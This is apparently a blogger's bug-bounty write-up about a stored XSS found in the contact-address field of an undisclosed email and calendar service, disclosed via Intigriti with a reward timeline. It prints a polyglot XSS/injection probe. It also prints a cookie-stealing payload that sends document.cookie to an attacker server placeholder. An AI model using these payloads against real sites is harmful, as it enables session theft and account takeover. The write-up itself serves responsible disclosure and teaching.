How I find my first Stored XSS: 650€


Hi everyone! 🎉

My name is Filipe Azevedo, known as filipaze on the internet. This is my first write-up. 😃

How I started:

During the COVID-19 pandemic with nothing to do between classes, I ventured into the world of cybersecurity and started doing bug bounties in October last year.

So, let’s go to the funny part:

I started the recon on a target that for obvious reasons I can’t disclose. It was a service similar to Google, has an email service, calendar, etc.

The part that caught my attention the most was the agenda service, which allowed you to save contacts and share them with someone.

Like every time I start hacking a target I use the app as a normal user and in the process I fill every input with <img src=x onerror=alert()>’”${{2*2}}

With this payload, I test for HTML injection, XSS, and code injection. All of this, with one payload 😇

The site made it possible to associate an address with a contact. In the final contact, a map for the address was added along with the other contact details, and that was where the bug was. I notice that if I put the payload <imf src=x onerror=alert()> on the address input, the XSS was triggered. So, I have a Stored XSS in my hands.

But happiness was short-lived. I realized that if the payload escaped a little from what I put in initially, it would stop working. For example, is I change this:

<img src=x onerror=alert()>

to this:

<img src=x onerror=alert(“hacked”)>

the payload stopped working.

But suddenly I thought if this address is going to be used to serve a map to the user, maybe if he finds a location for my address, the payload will work. So I tried! And guess what! IT WORKED!!!!!

So now, I was able to deliver any payload to the victim just by adding a city before the payload. Before reporting this to the company I tried successfully steal my account’s cookies. This was the payload I used to do that:

new york <img src=x onerror=this.src=’<PUT_HERE_YOUR_SERVER>?’+document.cookie> (I used ngrok)

Yes, this payload generates an unlimited number of requests to your server, but I was limited to 100 characters, so I needed to keep it the smallest possible.

I reported to the company and got rewarded 2 weeks and a half later.


26–04–2021: Reported to the company

27–04–2021: Triaged by Intigriti

03–05–2021: Validated by the company

12–05–2021: Rewarded €€€!




Ethical Hacker | Bug Bounty Hunter | CTF Player |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

An updated guide on Staking Harmony (One) via a Google Chrome extension

HackThisSite Realistic Mission 2

How Server Security Services Protect Your Servers?

Sever security at Techbrace kozhikode

Really? Chinese never care about privacy?

Manus has become the standard for non-standard finger data

How to be Tech Savvy in a Hostile World.

Cloud Computing (Draft)

How to get Job into Cyber Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Filipe Azevedo | filipaze

Filipe Azevedo | filipaze

Ethical Hacker | Bug Bounty Hunter | CTF Player |

More from Medium

My experience of Hacking The Dutch Government

Top intriguing hackers:

Improving the impact of a mouse-related XSS with styling and CSS-gadgets

Playing With Password Reset Function